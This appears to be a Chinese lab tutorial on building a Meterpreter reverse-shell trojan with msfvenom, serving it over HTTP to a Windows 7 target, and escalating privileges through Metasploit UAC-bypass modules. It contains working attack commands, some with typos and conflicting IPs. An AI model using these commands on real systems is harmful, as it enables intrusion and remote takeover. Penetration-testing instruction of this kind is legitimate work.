遠程控制木馬以及提權
Kail攻擊機IP: 192.168.199.216
Win7靶機IP: 192.168.199.132
Kali Linux 2中提供了多個可以用來產生遠程控制被控端程序的方式,但是其中最為簡單強大的方法應該要數Msfvenom命令了。這個命令是著名滲透測試軟件Metasploit的一個功能。
以前舊版本的Metasploit中提供了兩條關於遠程控制被控端程序的命令,其中msfpayload負責用來生成攻擊載荷,msfencode負責對攻擊載荷進行編碼。新版本的Metasploit中將這兩條命令整合成為了msfvenom命令,下面給出了msfvenom的幾個常見的使用參數。
這里面的參數很多,但是實際使用起來很簡單,例如我們如果只是希望生成一個簡單的被控端程序,那么只需要使用參數-p、-f和-o即可,分別指定要使用的被控端程序(通常可以使用Metasploit中內置的被控端程序)
舉例:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.169.130 lport=5000 -f exe -o /root/payload.exe
生成一個遠程控制木馬,注意參數不要錯
1 msfvenom -a x86 -platform windows -p(pyaload) windows/meterpreter/reverse_tcp lhost=kaliip port=4444 -b"\x00"(刪掉null字符截斷)
-e(編碼器,很多,自找) x86/shikata_ga_nai -i(次數) 10 -f(form格式) exe >msf.exe(在root下生成一個msf文件即遠控木馬) 2 3 msfvenom -a x86 -platforms windows -p windows/meterpreter/reverse_tcp lhost=192.168.199.216 lport=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe >msf.exe
在root文件下可以看到一個exe文件
試一試handler監聽模塊,並配置監聽腳本
use exploit/multi/handler
默認的payload是generic/shell_reverse_tcp,所以需要改,並開始監聽run
接下來可以直接利用python語句掛一個簡單http服務器
1 python -m SimpleHTTPServer 800(大小寫注意)
模擬用戶在惡意網站192.168.199.216:800下了一個軟件,安裝並運行。
點擊運行,可以看到反彈了一個meterpreter。
但只是普通管理員的權限,無法創建用戶,也無法更換系統權限。
我們可以通過提高程序的運行級別、繞過UAC,和提權漏洞進行更換系統權限。
下面只展示提高程序運行級別和繞過UAC兩種方法。
提高程序的運行級別(特殊模塊)
主動提問模塊,主動向用戶申請系統權限。info查看需要的參數(require參數為yes必填),
Sessions1是剛才handler時沒有改payload產生的shell。我們使用沒有系統權限的session3
Win7自動彈窗,點擊是,得到會話窗口
繞過UAC提權(特殊模塊)
也可以利用另外一些模塊use exploit/windows/local/bypassuac
有很多相關的,選一個最簡單的
可以用info查看模塊原理
use exploit/windows/local/bypassuac
payload默認是反彈tcp
show options
只需要補上session
使用沒系統權限的的session3